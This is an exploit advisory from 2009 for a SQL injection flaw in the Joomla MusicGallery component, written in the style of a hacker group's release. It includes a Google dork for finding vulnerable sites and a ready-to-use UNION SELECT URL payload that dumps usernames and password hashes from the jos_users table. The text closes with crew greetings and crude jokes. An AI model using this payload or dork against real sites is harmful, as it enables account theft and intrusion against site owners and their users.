/**************************************************************************

[!] Joomla Component MusicGallery SQL injection vulnerability
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : November 15, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Download : http://joomlacode.org/gf/project/musicgallery/
[+] Developer Info : Itamar Elharar
[+] Description : multimedia mp3 gallery by category.
[+] Development Status: 4 – Beta
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
[+] Dork : intitle:”kaMtiEz”+”tukulesto”

===========================================================================

[ Here we go.. Proof of Concept ]

http://127.0.0.1/index.php?option=com_musicgallery&task=itempage&id=[INDONESIANCODER]

[ Exploit ]

index.php?option=com_musicgallery&task=itempage&id=-23+union+select+1,1,concat%28username,0x3a,password%29,1,database%28%29,666,1,version%28%29,0x446f6e2054756b756c6573746f,1,2009,0x496e646f6e657369616e20436f646572,1,1,1+from+jos_users--&Itemid=54

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!

[ Not ALLOWED ! ]

[+] FOR MALINGSIAL

[ QUOTE ]

[+] kaMtiEz : nyelip dari mana ini yah !!! lol~
[+] ok, Don’t forget to say : Saya terima nikmatnya anak bapak dengan seperangkat alat kelamin di bayar tunai.
[+] also Dengan kekuatan datang bulan… akan menghukum mu !!! XD